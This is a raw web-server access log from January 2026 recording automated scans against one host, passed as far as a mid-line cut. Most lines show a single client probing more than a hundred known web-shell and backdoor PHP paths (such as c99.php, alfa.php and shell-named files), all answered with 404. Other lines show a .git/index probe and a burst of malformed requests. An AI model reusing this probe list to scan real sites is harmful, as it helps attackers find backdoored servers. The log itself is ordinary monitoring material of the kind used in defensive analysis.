92-249-249-197.pool.digikabel.hu "/xeqdlun.php" [Client 68.218.11.70] [Length 150] [Gzip -] "-" "-" +[12/Jan/2026:05:21:07 +0000] 404 - GET http 92-249-249-197.pool.digikabel.hu "/ws37.php" [Client 68.218.11.70] [Length 150] [Gzip -] "-" "-" +[12/Jan/2026:05:21:07 +0000] 404 - GET http 92-249-249-197.pool.digikabel.hu "/ws36.php" [Client 68.218.11.70] [Length 150] [Gzip -] "-" "-" +[12/Jan/2026:05:21:07 +0000] 404 - GET http 92-249-249-197.pool.digikabel.hu "/xinder.php" [Client 68.218.11.70] [Length 150] [Gzip -] "-" "-" +[12/Jan/2026:05:21:08 +0000] 404 - GET http 92-249-249-197.pool.digikabel.hu "/rendi59.php" [Client 68.218.11.70] [Length 150] [Gzip -] "-" "-" +[12/Jan/2026:05:21:08 +0000] 404 - GET http 92-249-249-197.pool.digikabel.hu "/test/lm.php" [Client 68.218.11.70] [Length 150] [Gzip -] "-" "-" +[12/Jan/2026:05:21:08 +0000] 404 - GET http 92-249-249-197.pool.digikabel.hu "/style2.php" [Client 68.218.11.70] [Length 150] [Gzip -] "-" "-" +[12/Jan/2026:05:21:08 +0000] 404 - GET http 92-249-249-197.pool.digikabel.hu "//alfa.php" [Client 68.218.11.70] [Length 150] [Gzip -] "-" "-" +[12/Jan/2026:05:21:09 +0000] 404 - GET http 92-249-249-197.pool.digikabel.hu "/wpupex.php" [Client 68.218.11.70] [Length 150] [Gzip -] "-" "-" +[12/Jan/2026:05:21:09 +0000] 404 - GET http 92-249-249-197.pool.digikabel.hu "/ava.php" [Client 68.218.11.70] [Length 150] [Gzip -] "-" "-" +[12/Jan/2026:05:21:09 +0000] 404 - GET http 92-249-249-197.pool.digikabel.hu "/nks.php" [Client 68.218.11.70] [Length 150] [Gzip -] "-" "-" +[12/Jan/2026:05:21:09 +0000] 404 - GET http 92-249-249-197.pool.digikabel.hu "//wp-content/languages/index.php" [Client 68.218.11.70] [Length 150] [Gzip -] "-" "-" +[12/Jan/2026:05:21:10 +0000] 404 - GET http 92-249-249-197.pool.digikabel.hu "//wp-content/uploads/index.php" [Client 68.218.11.70] [Length 150] [Gzip -] "-" "-" +[12/Jan/2026:05:21:10 +0000] 404 - GET http 92-249-249-197.pool.digikabel.hu "/ss.php" [Client 68.218.11.70] [Length 150] [Gzip -] "-" "-" +[12/Jan/2026:05:21:10 +0000] 404 - GET http 92-249-249-197.pool.digikabel.hu "/.well-known/content.php" [Client 68.218.11.70] [Length 150] [Gzip -] "-" "-" +[12/Jan/2026:05:21:10 +0000] 404 - GET http 92-249-249-197.pool.digikabel.hu "/sxo.php" [Client 68.218.11.70] [Length 150] [Gzip -] "-" "-" +[12/Jan/2026:05:21:11 +0000] 404 - GET http 92-249-249-197.pool.digikabel.hu "//wp-content/themes/hideo/network.php" [Client 68.218.11.70] [Length 150] [Gzip -] "-" "-" +[12/Jan/2026:05:21:11 +0000] 404 - GET http 92-249-249-197.pool.digikabel.hu "/cache/wp-post-data.php" [Client 68.218.11.70] [Length 150] [Gzip -] "-" "-" +[12/Jan/2026:05:21:11 +0000] 404 - GET http 92-249-249-197.pool.digikabel.hu "/uploads/Casper.php" [Client 68.218.11.70] [Length 150] [Gzip -] "-" "-" +[12/Jan/2026:05:21:11 +0000] 404 - GET http 92-249-249-197.pool.digikabel.hu "/new.php" [Client 68.218.11.70] [Length 150] [Gzip -] "-" "-" +[12/Jan/2026:05:21:12 +0000] 404 - GET http 92-249-249-197.pool.digikabel.hu "/wp-admin/images/commentv.php" [Client 68.218.11.70] [Length 150] [Gzip -] "-" "-" +[12/Jan/2026:05:21:12 +0000] 404 - GET http 92-249-249-197.pool.digikabel.hu "/x/" [Client 68.218.11.70] [Length 150] [Gzip -] "-" "-" +[12/Jan/2026:05:21:12 +0000] 404 - GET http 92-249-249-197.pool.digikabel.hu "/dom.php" [Client 68.218.11.70] [Length 150] [Gzip -] "-" "-" +[12/Jan/2026:05:21:12 +0000] 404 - GET http 92-249-249-197.pool.digikabel.hu "/ooj.php" [Client 68.218.11.70] [Length 150] [Gzip -] "-" "-" +[12/Jan/2026:05:21:13 +0000] 404 - GET http 92-249-249-197.pool.digikabel.hu "/wp-content/" [Client 68.218.11.70] [Length 150] [Gzip -] "-" "-" +[12/Jan/2026:05:21:13 +0000] 404 - GET http 92-249-249-197.pool.digikabel.hu "/BGA.php" [Client 68.218.11.70] [Length 150] [Gzip -] "-" "-" +[12/Jan/2026:05:21:13 +0000] 404 - GET http 92-249-249-197.pool.digikabel.hu "//sad/about.php" [Client 68.218.11.70] [Length 150] [Gzip -] "-" "-" +[12/Jan/2026:05:21:13 +0000] 404 - GET http 92-249-249-197.pool.digikabel.hu "/nas.php" [Client 68.218.11.70] [Length 150] [Gzip -] "-" "-" +[12/Jan/2026:05:21:14 +0000] 404 - GET http 92-249-249-197.pool.digikabel.hu "/loi.php" [Client 68.218.11.70] [Length 150] [Gzip -] "-" "-" +[12/Jan/2026:05:21:14 +0000] 404 - GET http 92-249-249-197.pool.digikabel.hu "/lov.php" [Client 68.218.11.70] [Length 150] [Gzip -] "-" "-" +[12/Jan/2026:05:21:14 +0000] 404 - GET http 92-249-249-197.pool.digikabel.hu "/avaa.php" [Client 68.218.11.70] [Length 150] [Gzip -] "-" "-" +[12/Jan/2026:05:21:15 +0000] 404 - GET http 92-249-249-197.pool.digikabel.hu "/nwwha.php" [Client 68.218.11.70] [Length 150] [Gzip -] "-" "-" +[12/Jan/2026:05:21:15 +0000] 404 - GET http 92-249-249-197.pool.digikabel.hu "//index/function.php" [Client 68.218.11.70] [Length 150] [Gzip -] "-" "-" +[12/Jan/2026:05:21:15 +0000] 404 - GET http 92-249-249-197.pool.digikabel.hu "//admin.php" [Client 68.218.11.70] [Length 150] [Gzip -] "-" "-" +[12/Jan/2026:05:21:15 +0000] 404 - GET http 92-249-249-197.pool.digikabel.hu "/wp-includes/IXR/moon.php" [Client 68.218.11.70] [Length 150] [Gzip -] "-" "-" +[12/Jan/2026:05:21:16 +0000] 404 - GET http 92-249-249-197.pool.digikabel.hu "//shell20211028.php" [Client 68.218.11.70] [Length 150] [Gzip -] "-" "-" +[12/Jan/2026:05:21:16 +0000] 404 - GET http 92-249-249-197.pool.digikabel.hu "//skin/install/default/security.php" [Client 68.218.11.70] [Length 150] [Gzip -] "-" "-" +[12/Jan/2026:05:21:16 +0000] 404 - GET http 92-249-249-197.pool.digikabel.hu "/~norapump/hah.php" [Client 68.218.11.70] [Length 150] [Gzip -] "-" "-" +[12/Jan/2026:05:21:16 +0000] 404 - GET http 92-249-249-197.pool.digikabel.hu "//wp-admin/class-db.php" [Client 68.218.11.70] [Length 150] [Gzip -] "-" "-" +[12/Jan/2026:05:21:17 +0000] 404 - GET http 92-249-249-197.pool.digikabel.hu "//buy.php" [Client 68.218.11.70] [Length 150] [Gzip -] "-" "-" +[12/Jan/2026:05:21:17 +0000] 404 - GET http 92-249-249-197.pool.digikabel.hu "/gib.php" [Client 68.218.11.70] [Length 150] [Gzip -] "-" "-" +[12/Jan/2026:05:21:17 +0000] 404 - GET http 92-249-249-197.pool.digikabel.hu "/des.php" [Client 68.218.11.70] [Length 150] [Gzip -] "-" "-" +[12/Jan/2026:05:21:17 +0000] 404 - GET http 92-249-249-197.pool.digikabel.hu "//wp-content/plugins/achdxhv/languages/admin.php" [Client 68.218.11.70] [Length 150] [Gzip -] "-" "-" +[12/Jan/2026:05:21:18 +0000] 404 - GET http 92-249-249-197.pool.digikabel.hu "/hzz.php" [Client 68.218.11.70] [Length 150] [Gzip -] "-" "-" +[12/Jan/2026:05:21:18 +0000] 404 - GET http 92-249-249-197.pool.digikabel.hu "/rezor.php" [Client 68.218.11.70] [Length 150] [Gzip -] "-" "-" +[12/Jan/2026:05:21:18 +0000] 404 - GET http 92-249-249-197.pool.digikabel.hu "/wp-admin/network/" [Client 68.218.11.70] [Length 150] [Gzip -] "-" "-" +[12/Jan/2026:05:21:18 +0000] 404 - GET http 92-249-249-197.pool.digikabel.hu "/oivcl.php" [Client 68.218.11.70] [Length 150] [Gzip -] "-" "-" +[12/Jan/2026:05:21:19 +0000] 404 - GET http 92-249-249-197.pool.digikabel.hu "/wp-admin/install.php" [Client 68.218.11.70] [Length 150] [Gzip -] "-" "-" +[12/Jan/2026:05:21:19 +0000] 404 - GET http 92-249-249-197.pool.digikabel.hu "/db.php" [Client 68.218.11.70] [Length 150] [Gzip -] "-" "-" +[12/Jan/2026:05:21:19 +0000] 404 - GET http 92-249-249-197.pool.digikabel.hu "//autoload_classmap.php" [Client 68.218.11.70] [Length 150] [Gzip -] "-" "-" +[12/Jan/2026:05:21:19 +0000] 404 - GET http 92-249-249-197.pool.digikabel.hu "/dropdown.php" [Client 68.218.11.70] [Length 150] [Gzip -] "-" "-" +[12/Jan/2026:05:21:20 +0000] 404 - GET http 92-249-249-197.pool.digikabel.hu "/images/c99.php" [Client 68.218.11.70] [Length 150] [Gzip -] "-" "-" +[12/Jan/2026:05:21:20 +0000] 404 - GET http 92-249-249-197.pool.digikabel.hu "//doc.php" [Client 68.218.11.70] [Length 150] [Gzip -] "-" "-" +[12/Jan/2026:05:21:20 +0000] 404 - GET http 92-249-249-197.pool.digikabel.hu "/ps.php" [Client 68.218.11.70] [Length 150] [Gzip -] "-" "-" +[12/Jan/2026:05:21:20 +0000] 404 - GET http 92-249-249-197.pool.digikabel.hu "//wp-content/about.php" [Client 68.218.11.70] [Length 150] [Gzip -] "-" "-" +[12/Jan/2026:05:21:21 +0000] 404 - GET http 92-249-249-197.pool.digikabel.hu "/output.php" [Client 68.218.11.70] [Length 150] [Gzip -] "-" "-" +[12/Jan/2026:05:21:21 +0000] 404 - GET http 92-249-249-197.pool.digikabel.hu "/wp-xml.php" [Client 68.218.11.70] [Length 150] [Gzip -] "-" "-" +[12/Jan/2026:05:21:21 +0000] 404 - GET http 92-249-249-197.pool.digikabel.hu "/13.php" [Client 68.218.11.70] [Length 150] [Gzip -] "-" "-" +[12/Jan/2026:05:21:21 +0000] 404 - GET http 92-249-249-197.pool.digikabel.hu "/wp-2019.php" [Client 68.218.11.70] [Length 150] [Gzip -] "-" "-" +[12/Jan/2026:05:21:22 +0000] 404 - GET http 92-249-249-197.pool.digikabel.hu "/classwithtostring.php" [Client 68.218.11.70] [Length 150] [Gzip -] "-" "-" +[12/Jan/2026:05:21:22 +0000] 404 - GET http 92-249-249-197.pool.digikabel.hu "/.trash7309/fafa/" [Client 68.218.11.70] [Length 150] [Gzip -] "-" "-" +[12/Jan/2026:05:21:22 +0000] 404 - GET http 92-249-249-197.pool.digikabel.hu "//wp.php" [Client 68.218.11.70] [Length 150] [Gzip -] "-" "-" +[12/Jan/2026:05:21:22 +0000] 404 - GET http 92-249-249-197.pool.digikabel.hu "//lufix.php" [Client 68.218.11.70] [Length 150] [Gzip -] "-" "-" +[12/Jan/2026:05:21:23 +0000] 404 - GET http 92-249-249-197.pool.digikabel.hu "//elp.php" [Client 68.218.11.70] [Length 150] [Gzip -] "-" "-" +[12/Jan/2026:05:21:23 +0000] 404 - GET http 92-249-249-197.pool.digikabel.hu "/wrt.php" [Client 68.218.11.70] [Length 150] [Gzip -] "-" "-" +[12/Jan/2026:05:21:23 +0000] 404 - GET http 92-249-249-197.pool.digikabel.hu "/dr.php" [Client 68.218.11.70] [Length 150] [Gzip -] "-" "-" +[12/Jan/2026:05:21:24 +0000] 404 - GET http 92-249-249-197.pool.digikabel.hu "/wp-includes/blocks/" [Client 68.218.11.70] [Length 150] [Gzip -] "-" "-" +[12/Jan/2026:05:21:24 +0000] 404 - GET http 92-249-249-197.pool.digikabel.hu "/wtu.php" [Client 68.218.11.70] [Length 150] [Gzip -] "-" "-" +[12/Jan/2026:05:21:24 +0000] 404 - GET http 92-249-249-197.pool.digikabel.hu "/blog/byp.php" [Client 68.218.11.70] [Length 150] [Gzip -] "-" "-" +[12/Jan/2026:05:21:24 +0000] 404 - GET http 92-249-249-197.pool.digikabel.hu "/led.php" [Client 68.218.11.70] [Length 150] [Gzip -] "-" "-" +[12/Jan/2026:05:21:25 +0000] 404 - GET http 92-249-249-197.pool.digikabel.hu "/bhfnd.php" [Client 68.218.11.70] [Length 150] [Gzip -] "-" "-" +[12/Jan/2026:05:21:25 +0000] 404 - GET http 92-249-249-197.pool.digikabel.hu "//index/function.php" [Client 68.218.11.70] [Length 150] [Gzip -] "-" "-" +[12/Jan/2026:05:21:25 +0000] 404 - GET http 92-249-249-197.pool.digikabel.hu "/readme.php" [Client 68.218.11.70] [Length 150] [Gzip -] "-" "-" +[12/Jan/2026:05:21:25 +0000] 404 - GET http 92-249-249-197.pool.digikabel.hu "/aku.php" [Client 68.218.11.70] [Length 150] [Gzip -] "-" "-" +[12/Jan/2026:05:21:26 +0000] 404 - GET http 92-249-249-197.pool.digikabel.hu "//wp-content/themes/about.php" [Client 68.218.11.70] [Length 150] [Gzip -] "-" "-" +[12/Jan/2026:05:21:26 +0000] 404 - GET http 92-249-249-197.pool.digikabel.hu "/x.php" [Client 68.218.11.70] [Length 150] [Gzip -] "-" "-" +[12/Jan/2026:05:21:26 +0000] 404 - GET http 92-249-249-197.pool.digikabel.hu "/fox.php" [Client 68.218.11.70] [Length 150] [Gzip -] "-" "-" +[12/Jan/2026:05:21:26 +0000] 404 - GET http 92-249-249-197.pool.digikabel.hu "/7f8c8.php" [Client 68.218.11.70] [Length 150] [Gzip -] "-" "-" +[12/Jan/2026:05:21:27 +0000] 404 - GET http 92-249-249-197.pool.digikabel.hu "/poj.php" [Client 68.218.11.70] [Length 150] [Gzip -] "-" "-" +[12/Jan/2026:05:21:27 +0000] 404 - GET http 92-249-249-197.pool.digikabel.hu "/zze.php" [Client 68.218.11.70] [Length 150] [Gzip -] "-" "-" +[12/Jan/2026:05:21:27 +0000] 404 - GET http 92-249-249-197.pool.digikabel.hu "//wp-content/" [Client 68.218.11.70] [Length 150] [Gzip -] "-" "-" +[12/Jan/2026:05:21:28 +0000] 404 - GET http 92-249-249-197.pool.digikabel.hu "/weozh.php" [Client 68.218.11.70] [Length 150] [Gzip -] "-" "-" +[12/Jan/2026:05:21:28 +0000] 404 - GET http 92-249-249-197.pool.digikabel.hu "//wp-content/themes/about.php" [Client 68.218.11.70] [Length 150] [Gzip -] "-" "-" +[12/Jan/2026:05:21:28 +0000] 404 - GET http 92-249-249-197.pool.digikabel.hu "/zznmg.php" [Client 68.218.11.70] [Length 150] [Gzip -] "-" "-" +[12/Jan/2026:05:21:28 +0000] 404 - GET http 92-249-249-197.pool.digikabel.hu "/help/crnpwfiu.php" [Client 68.218.11.70] [Length 150] [Gzip -] "-" "-" +[12/Jan/2026:05:21:29 +0000] 404 - GET http 92-249-249-197.pool.digikabel.hu "/eru.php" [Client 68.218.11.70] [Length 150] [Gzip -] "-" "-" +[12/Jan/2026:05:21:29 +0000] 404 - GET http 92-249-249-197.pool.digikabel.hu "/index/zwso.php" [Client 68.218.11.70] [Length 150] [Gzip -] "-" "-" +[12/Jan/2026:05:21:29 +0000] 404 - GET http 92-249-249-197.pool.digikabel.hu "/images/2008.php" [Client 68.218.11.70] [Length 150] [Gzip -] "-" "-" +[12/Jan/2026:05:21:29 +0000] 404 - GET http 92-249-249-197.pool.digikabel.hu "//.cache/x.php" [Client 68.218.11.70] [Length 150] [Gzip -] "-" "-" +[12/Jan/2026:05:21:30 +0000] 404 - GET http 92-249-249-197.pool.digikabel.hu "/pow.php" [Client 68.218.11.70] [Length 150] [Gzip -] "-" "-" +[12/Jan/2026:05:21:30 +0000] 404 - GET http 92-249-249-197.pool.digikabel.hu "/dop.php" [Client 68.218.11.70] [Length 150] [Gzip -] "-" "-" +[12/Jan/2026:05:21:30 +0000] 404 - GET http 92-249-249-197.pool.digikabel.hu "/wp-content/plugins/" [Client 68.218.11.70] [Length 150] [Gzip -] "-" "-" +[12/Jan/2026:05:21:30 +0000] 404 - GET http 92-249-249-197.pool.digikabel.hu "/lv.php" [Client 68.218.11.70] [Length 150] [Gzip -] "-" "-" +[12/Jan/2026:05:21:31 +0000] 404 - GET http 92-249-249-197.pool.digikabel.hu "/MTOS/byp.php" [Client 68.218.11.70] [Length 150] [Gzip -] "-" "-" +[12/Jan/2026:05:21:31 +0000] 404 - GET http 92-249-249-197.pool.digikabel.hu "//wp-includes/assets/index.php" [Client 68.218.11.70] [Length 150] [Gzip -] "-" "-" +[12/Jan/2026:05:21:31 +0000] 404 - GET http 92-249-249-197.pool.digikabel.hu "//wp-includes/customize/index.php" [Client 68.218.11.70] [Length 150] [Gzip -] "-" "-" +[12/Jan/2026:05:21:31 +0000] 404 - GET http 92-249-249-197.pool.digikabel.hu "/pkmoj.php" [Client 68.218.11.70] [Length 150] [Gzip -] "-" "-" +[12/Jan/2026:05:21:32 +0000] 404 - GET http 92-249-249-197.pool.digikabel.hu "/uploads/upload2.php" [Client 68.218.11.70] [Length 150] [Gzip -] "-" "-" +[12/Jan/2026:05:21:32 +0000] 404 - GET http 92-249-249-197.pool.digikabel.hu "/hehehehe.php" [Client 68.218.11.70] [Length 150] [Gzip -] "-" "-" +[12/Jan/2026:05:21:32 +0000] 404 - GET http 92-249-249-197.pool.digikabel.hu "/fss.php" [Client 68.218.11.70] [Length 150] [Gzip -] "-" "-" +[12/Jan/2026:05:21:32 +0000] 404 - GET http 92-249-249-197.pool.digikabel.hu "/wwr.php" [Client 68.218.11.70] [Length 150] [Gzip -] "-" "-" +[12/Jan/2026:05:21:33 +0000] 404 - GET http 92-249-249-197.pool.digikabel.hu "//content.php" [Client 68.218.11.70] [Length 150] [Gzip -] "-" "-" +[12/Jan/2026:05:21:33 +0000] 404 - GET http 92-249-249-197.pool.digikabel.hu "/wp-content/kj.php" [Client 68.218.11.70] [Length 150] [Gzip -] "-" "-" +[12/Jan/2026:05:21:33 +0000] 404 - GET http 92-249-249-197.pool.digikabel.hu "/update/wpupex.php" [Client 68.218.11.70] [Length 150] [Gzip -] "-" "-" +[12/Jan/2026:05:21:33 +0000] 404 - GET http 92-249-249-197.pool.digikabel.hu "//install.php" [Client 68.218.11.70] [Length 150] [Gzip -] "-" "-" +[12/Jan/2026:05:21:34 +0000] 404 - GET http 92-249-249-197.pool.digikabel.hu "/kopyw.php" [Client 68.218.11.70] [Length 150] [Gzip -] "-" "-" +[12/Jan/2026:05:21:34 +0000] 404 - GET http 92-249-249-197.pool.digikabel.hu "/cong.php" [Client 68.218.11.70] [Length 150] [Gzip -] "-" "-" +[12/Jan/2026:05:21:34 +0000] 404 - GET http 92-249-249-197.pool.digikabel.hu "//wp-includes/css/about.php" [Client 68.218.11.70] [Length 150] [Gzip -] "-" "-" +[12/Jan/2026:05:21:35 +0000] 404 - GET http 92-249-249-197.pool.digikabel.hu "/shop.php" [Client 68.218.11.70] [Length 150] [Gzip -] "-" "-" +[12/Jan/2026:05:21:35 +0000] 404 - GET http 92-249-249-197.pool.digikabel.hu "/lla.php" [Client 68.218.11.70] [Length 150] [Gzip -] "-" "-" +[12/Jan/2026:05:21:35 +0000] 404 - GET http 92-249-249-197.pool.digikabel.hu "/nok.php" [Client 68.218.11.70] [Length 150] [Gzip -] "-" "-" +[12/Jan/2026:05:21:35 +0000] 404 - GET http 92-249-249-197.pool.digikabel.hu "/wp-content/uploads/2024/dodo.php" [Client 68.218.11.70] [Length 150] [Gzip -] "-" "-" +[12/Jan/2026:05:21:36 +0000] 404 - GET http 92-249-249-197.pool.digikabel.hu "/ker.php" [Client 68.218.11.70] [Length 150] [Gzip -] "-" "-" +[12/Jan/2026:05:21:36 +0000] 404 - GET http 92-249-249-197.pool.digikabel.hu "//dropdown.php" [Client 68.218.11.70] [Length 150] [Gzip -] "-" "-" +[12/Jan/2026:05:21:36 +0000] 404 - GET http 92-249-249-197.pool.digikabel.hu "/wp-includes/images/403.php" [Client 68.218.11.70] [Length 150] [Gzip -] "-" "-" +[12/Jan/2026:05:21:36 +0000] 404 - GET http 92-249-249-197.pool.digikabel.hu "/~elliotimformatiq/sxp.php" [Client 68.218.11.70] [Length 150] [Gzip -] "-" "-" +[12/Jan/2026:05:21:37 +0000] 404 - GET http 92-249-249-197.pool.digikabel.hu "/qfvqu.php" [Client 68.218.11.70] [Length 150] [Gzip -] "-" "-" +[12/Jan/2026:05:21:37 +0000] 404 - GET http 92-249-249-197.pool.digikabel.hu "/crt.php" [Client 68.218.11.70] [Length 150] [Gzip -] "-" "-" +[12/Jan/2026:05:21:37 +0000] 404 - GET http 92-249-249-197.pool.digikabel.hu "/2eaa2.php" [Client 68.218.11.70] [Length 150] [Gzip -] "-" "-" +[12/Jan/2026:05:21:37 +0000] 404 - GET http 92-249-249-197.pool.digikabel.hu "/wp-includes/css/" [Client 68.218.11.70] [Length 150] [Gzip -] "-" "-" +[12/Jan/2026:05:21:38 +0000] 404 - GET http 92-249-249-197.pool.digikabel.hu "/has.php" [Client 68.218.11.70] [Length 150] [Gzip -] "-" "-" +[12/Jan/2026:05:21:38 +0000] 404 - GET http 92-249-249-197.pool.digikabel.hu "/nka.php" [Client 68.218.11.70] [Length 150] [Gzip -] "-" "-" +[12/Jan/2026:05:21:38 +0000] 404 - GET http 92-249-249-197.pool.digikabel.hu "//wp-content/" [Client 68.218.11.70] [Length 150] [Gzip -] "-" "-" +[12/Jan/2026:05:21:38 +0000] 404 - GET http 92-249-249-197.pool.digikabel.hu "/dropdown.php" [Client 68.218.11.70] [Length 150] [Gzip -] "-" "-" +[12/Jan/2026:05:21:39 +0000] 404 - GET http 92-249-249-197.pool.digikabel.hu "//wp-includes/Text/wp-login.php" [Client 68.218.11.70] [Length 150] [Gzip -] "-" "-" +[12/Jan/2026:05:21:39 +0000] 404 - GET http 92-249-249-197.pool.digikabel.hu "//cgi-bin/wp-login.php" [Client 68.218.11.70] [Length 150] [Gzip -] "-" "-" +[12/Jan/2026:05:21:39 +0000] 404 - GET http 92-249-249-197.pool.digikabel.hu "/jvcpa.php" [Client 68.218.11.70] [Length 150] [Gzip -] "-" "-" +[12/Jan/2026:05:21:39 +0000] 404 - GET http 92-249-249-197.pool.digikabel.hu "/zil.php" [Client 68.218.11.70] [Length 150] [Gzip -] "-" "-" +[12/Jan/2026:05:21:40 +0000] 404 - GET http 92-249-249-197.pool.digikabel.hu "/images/uploadform.php" [Client 68.218.11.70] [Length 150] [Gzip -] "-" "-" +[12/Jan/2026:05:21:40 +0000] 404 - GET http 92-249-249-197.pool.digikabel.hu "/system_log.php" [Client 68.218.11.70] [Length 150] [Gzip -] "-" "-" +[12/Jan/2026:05:21:40 +0000] 404 - GET http 92-249-249-197.pool.digikabel.hu "/wordpress/clo.php" [Client 68.218.11.70] [Length 150] [Gzip -] "-" "-" +[12/Jan/2026:05:21:41 +0000] 404 - GET http 92-249-249-197.pool.digikabel.hu "/.well-known/zip.php" [Client 68.218.11.70] [Length 150] [Gzip -] "-" "-" +[12/Jan/2026:05:21:41 +0000] 404 - GET http 92-249-249-197.pool.digikabel.hu "/ar.php" [Client 68.218.11.70] [Length 150] [Gzip -] "-" "-" +[12/Jan/2026:05:21:41 +0000] 404 - GET http 92-249-249-197.pool.digikabel.hu "/shelp.php" [Client 68.218.11.70] [Length 150] [Gzip -] "-" "-" +[12/Jan/2026:05:21:41 +0000] 404 - GET http 92-249-249-197.pool.digikabel.hu "/wordpress/yts.php" [Client 68.218.11.70] [Length 150] [Gzip -] "-" "-" +[12/Jan/2026:05:21:42 +0000] 404 - GET http 92-249-249-197.pool.digikabel.hu "/file.php" [Client 68.218.11.70] [Length 150] [Gzip -] "-" "-" +[12/Jan/2026:05:21:42 +0000] 404 - GET http 92-249-249-197.pool.digikabel.hu "/wp-admin/images/Mhbgf.php" [Client 68.218.11.70] [Length 150] [Gzip -] "-" "-" +[12/Jan/2026:05:21:42 +0000] 404 - GET http 92-249-249-197.pool.digikabel.hu "/wp-admin/maint/" [Client 68.218.11.70] [Length 150] [Gzip -] "-" "-" +[12/Jan/2026:05:21:42 +0000] 404 - GET http 92-249-249-197.pool.digikabel.hu "/first.php" [Client 68.218.11.70] [Length 150] [Gzip -] "-" "-" +[12/Jan/2026:05:21:43 +0000] 404 - GET http 92-249-249-197.pool.digikabel.hu "//admin/function.php" [Client 68.218.11.70] [Length 150] [Gzip -] "-" "-" +[12/Jan/2026:05:21:43 +0000] 404 - GET http 92-249-249-197.pool.digikabel.hu "/404.php" [Client 68.218.11.70] [Length 150] [Gzip -] "-" "-" +[12/Jan/2026:05:21:43 +0000] 404 - GET http 92-249-249-197.pool.digikabel.hu "/wp/wp-includes//index.php" [Client 68.218.11.70] [Length 150] [Gzip -] "-" "-" +[12/Jan/2026:05:21:43 +0000] 404 - GET http 92-249-249-197.pool.digikabel.hu "/museu/yhweq.php" [Client 68.218.11.70] [Length 150] [Gzip -] "-" "-" +[12/Jan/2026:05:24:04 +0000] 404 - GET http 92.249.249.197 "/.git/index" [Client 77.83.39.162] [Length 183] [Gzip 3.21] "Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.87 YaBrowser/17.3.0.1785 Yowser/2.5 Safari/537.36" "-" +[12/Jan/2026:05:27:34 +0000] 200 - GET http 92.249.249.197 "/" [Client 204.76.203.212] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[12/Jan/2026:05:44:09 +0000] 200 - GET http 92.249.249.197 "/" [Client 149.50.103.48] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[12/Jan/2026:05:52:40 +0000] 200 - GET http 92.249.249.197 "/" [Client 204.76.203.212] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[12/Jan/2026:05:54:05 +0000] 400 - - http localhost-nginx-proxy-manager "-" [Client 95.214.55.246] [Length 154] [Gzip -] "-" "-" +[12/Jan/2026:05:54:06 +0000] 400 - - http localhost-nginx-proxy-manager "-" [Client 95.214.55.246] [Length 154] [Gzip -] "-" "-" +[12/Jan/2026:05:54:06 +0000] 400 - - http localhost-nginx-proxy-manager "-" [Client 95.214.55.246] [Length 154] [Gzip -] "-" "-" +[12/Jan/2026:05:54:06 +0000] 400 - - http localhost-nginx-proxy-manager "-" [Client 95.214.55.246] [Length 154] [Gzip -] "-" "-" +[12/Jan/2026:05:54:06 +0000] 400 - - http localhost-nginx-proxy-manager "-" [Client 95.214.55.246] [Length 154] [Gzip -] "-" "-" +[12/Jan/2026:05:54:06 +0000] 400 - - http localhost-nginx-proxy-manager "-" [Client 95.214.55.246] [Length 154] [Gzip -] "-" "-" +[12/Jan/2026:05:54:06 +0000] 400 - - http localhost-nginx-proxy-manager "-" [Client 95.214.55.246] [Length 154] [Gzip -] "-" "-" +[12/Jan/2026:05:54:06 +0000] 400 - - http localhost-nginx-proxy-manager "-" [Client 95.214.55.246] [Length 154] [Gzip -] "-" "-" +[12/Jan/2026:05:54:06 +0000] 400 - - http localhost-nginx-proxy-manager "-" [Client 95.214.55.246] [Length 154] [Gzip -] "-" "-" +[12/Jan/2026:05:54:07 +0000] 400 - - http localhost-nginx-proxy-manager "-" [Client 95.214.55.246] [Length 154] [Gzip -] "-" "-" +[12/Jan/2026:05:54:07 +0000] 400 - - http localhost-nginx-proxy-manager "-" [Client 95.214.55.246] [Length 154] [Gzip -] "-" "-" +[12/Jan/2026:05:54:07 +0000] 400 - - http localhost-nginx-proxy-manager "-" [Client 95.214.55.246] [Length 154] [Gzip -] "-" "-" +[12/Jan/2026:05:54:07 +0000] 400 - - http localhost-nginx-proxy-manager "-" [Client 95.214.55.246] [Length 154] [Gzip -] "-" "-" +[12/Jan/2026:05:54:07 +0000] 400 - - http localhost-nginx-proxy-manager "-" [Client 95.214.55.246] [Length 154] [Gzip -] "-" "-" +[12/Jan/2026:05:54:07 +0000] 400 - - http localhost-nginx-proxy-manager "-" [Client 95.214.55.246] [Length 154] [Gzip -] "-" "-" +[12/Jan/2026:05:54:07 +0000] 400 - - http localhost-nginx-proxy-manager "-" [Client 95.214.55.246] [Length 154] [Gzip -] "-" "-" +[12/Jan/2026:05:54:08 +0000] 400 - - http localhost-nginx-proxy-manager "-" [Client 95.214.55.246] [Length 154] [Gzip -] "-" "-" +[12/Jan/2026:05:54:08 +0000] 400 - - http localhost-nginx-proxy-manager "-" [Client 95.214.55.246] [Length 154] [Gzip -] "-" "-" +[12/Jan/2026:05:54:08 +0000] 400 - - http localhost-nginx-proxy-manager "-" [Client 95.214.55.246] [Length 154] [Gzip -] "-" "-" +[12/Jan/2026:05:54:08 +0000] 400 - - http localhost-nginx-proxy-manager "-" [Client 95.214.55.246] [Length 154] [Gzip -] "-" "-" +[12/Jan/2026:05:54:08 +0000] 400 - - http localhost-nginx-proxy-manager "-" [Client 95.214.55.246] [Length 154] [Gzip -] "-" "-" +[12/Jan/2026:05:54:08 +0000] 400 - - http localhost-nginx-proxy-manager "-" [Client 95.214.55.246] [Length 154] [Gzip -] "-" "-" +[12/Jan/2026:05:54:09 +0000] 400 - - http localhost-nginx-proxy-manager "-" [Client 95.214.55.246] [Length 154] [Gzip -] "-" "-" +[12/Jan/2026:05:54:09 +0000] 400 - - http localhost-nginx-proxy-manager "-" [Client 95.214.55.246] [Length 154] [Gzip -] "-" "-" +[12/Jan/2026:05:54:09 +0000] 400 - - http localhost-nginx-proxy-manager "-" [Client 